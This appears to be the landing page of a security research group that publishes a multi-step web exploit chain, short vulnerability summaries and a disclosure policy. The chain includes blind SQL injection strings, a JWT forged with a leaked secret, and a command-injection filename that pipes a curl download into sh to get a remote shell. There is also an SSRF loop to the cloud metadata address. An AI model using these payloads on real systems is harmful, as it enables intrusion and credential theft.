we document the gaps. _
a security research platform for cataloging, reproducing, and weaponizing the loopholes the rest of the industry pretends do not exist. zero ceremony. receipts only.
a real loophole is never a single bug. it is the dashed line connecting many small mistakes. follow the thread.
Stack traces returned in production responses leak internal package paths, framework versions, and database column names. Trivial on its own. Lethal as the first link.
# GET /api/v1/orders/0
500 Internal Server Error
PostgresError: column "users.session_token"
at /srv/app/node_modules/pg/lib/...
build: 4.18.2-internal+canary
The leaked column name from step 01 is the same one a weakly sanitized search filter happily concatenates into a LIKE clause. Now we have a query oracle.
?q=' AND substring(session_token,1,1)='a → 200 OK (truthy) ?q=' AND substring(session_token,1,1)='z → 200 OK (falsy, but timing differs by 180ms)
The token we exfiltrated is signed with a secret reused across staging and production -- and staging is on a public preview URL. Forge any session you want.
jwt.sign({sub: "admin", role: "root"},
"REDACTED-staging-secret",
{ algorithm: "HS256" })
=> eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
The forged admin role unlocks a report-export endpoint
that shells out to pdftk with the filename
unescaped. Game. Set. Match.
POST /admin/reports/export
{ "filename": "report; curl lp.hole/x | sh #" }
→ remote shell on report-worker-prod-7
→ cluster-admin via overprivileged service token
disclosed, in the wild, or sitting in a vendor inbox for too long. no marketing copy. just timestamps.
A popular billing SDK fetches the public key URL from the
webhook header. A loop through 169.254.169.254
yields cloud-metadata creds within seconds.
Symlinks inside a tarball are dereferenced AFTER the sandbox check. Write-anywhere primitive on extract.
Two concurrent polls within a 12ms window can both claim the same code. Account takeover via collision.
--__proto__.isAdmin=true. Yes, in 2026. Yes,
it shipped to a million build pipelines.
Trailing whitespace in Host bypasses the
normalizer. Poisoned response served to every tenant
sharing that POP.
A non-constant-time compare on the user-handle byte leaks one nibble per attempt. Slow, but it ends in keys.
what gets closed, eventually. the green stamp does not mean you are safe -- it means this specific edge is no longer ours.
v3.8.1
+27d
<image href> mitigated, sandbox enforced
+19d
none alg accepted on rotation endpoint -- now rejected
+11d
fetch() redirect timing -- isolated by COOP/COEP
+62d
90 days. extensions only when there is a real fix in flight. no NDAs. no hush money. PoCs published the day the patch ships unless lives are on the line.
— the loophole.dev research desk